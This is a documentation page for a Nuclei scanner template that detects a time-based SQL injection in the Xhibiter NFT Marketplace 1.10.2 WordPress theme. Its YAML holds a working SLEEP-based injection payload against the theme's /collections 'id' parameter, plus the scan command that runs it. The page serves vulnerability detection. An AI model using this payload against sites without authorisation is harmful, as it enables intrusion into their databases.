Xhibiter NFT Marketplace 1.10.2 - SQL Injection
ID: xhibiter-nft-sqli
Severity: high
Author: ProjectDiscoveryAI
Tags: xhibiter,sqli,time-based-sqli,wordpress,wp-theme,xhibiter,nft
Description
Section titled “Description”The Xhibiter NFT Marketplace version 1.10.2 is vulnerable to a SQL Injection vulnerability. This allows an attacker to manipulate SQL queries by injecting malicious SQL code through vulnerable input fields.
YAML Source
Section titled “YAML Source”id: xhibiter-nft-sqli
info: name: Xhibiter NFT Marketplace 1.10.2 - SQL Injection author: ProjectDiscoveryAI severity: high description: | The Xhibiter NFT Marketplace version 1.10.2 is vulnerable to a SQL Injection vulnerability. This allows an attacker to manipulate SQL queries by injecting malicious SQL code through vulnerable input fields. reference: - https://www.exploit-db.com/exploits/52060 - https://blog.securelayer7.net/sql-injection-vulnerability-in-xhibiter-nft-marketplace/ - https://x.com/ExploitDB/status/1807782485549560196 metadata: publicwww-query: "/wp-content/themes/xhibiter/" max-request: 2 tags: xhibiter,sqli,time-based-sqli,wordpress,wp-theme,xhibiter,nft
flow: http(1) && http(2)
http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}}
matchers: - type: word part: body words: - '/wp-content/themes/xhibiter/' internal: true
- raw: - | GET /collections?id=2'+AND+(SELECT+1492+FROM+(SELECT(SLEEP(7)))HsLV)+AND+'KEOa'='KEOa HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: dsl dsl: - 'status_code == 200' - 'duration>=7' condition: and# digest: 4a0a0047304502201300c0e6749fc5500ca12c51fde9c42ce6cb80706b27b4f390c63e721b6ce9bd022100bdf4ca22f7c7803438c6940e7703d7e5d29935361f99df8fed61d1be854b13c1:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/xhibiter-nft-sqli.yaml"